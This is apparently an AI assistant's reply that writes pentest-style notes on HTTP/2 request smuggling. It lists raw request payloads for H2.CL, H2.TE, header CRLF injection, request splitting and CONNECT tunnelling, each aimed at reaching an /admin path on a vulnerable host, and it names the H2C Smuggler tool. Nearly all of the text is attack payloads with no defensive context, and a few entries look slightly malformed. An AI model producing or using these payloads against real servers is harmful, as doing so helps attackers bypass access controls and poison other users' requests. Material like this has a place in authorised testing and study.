Certainly! Here is the content for HTTP/2 request smuggling techniques in the same style as your existing notes:

Request Smuggling HTTP/2

H2.CL

POST /target HTTP/2
Host: example.com
content-length: 0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10 
x=1GET / H

H2.TE

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Transfer-Encoding: chunked 

0 

GET /admin HTTP/1.1 
Host: vulnerable-website.com 
Foo: bar

CRLF Injection

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Foo: bar\nTransfer-Encoding: chunked

0

GET /admin HTTP/1.1 
Host: vulnerable-website.com 
Foo: bar

HTTP/2 Request Splitting

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Foo: bar\r\n 
\r\n 
GET /admin HTTP/1.1\r\n 
Host: vulnerable-website.com

HTTP Request Tunneling

To Review (opens in a new tab)

:method: CONNECT
:scheme: https
:path: /target
:authority: example.com
content-length: 13

0

CONNECT /admin HTTP/2
:authority: example.com

Tool

H2C Smuggler (opens in a new tab)

Cvss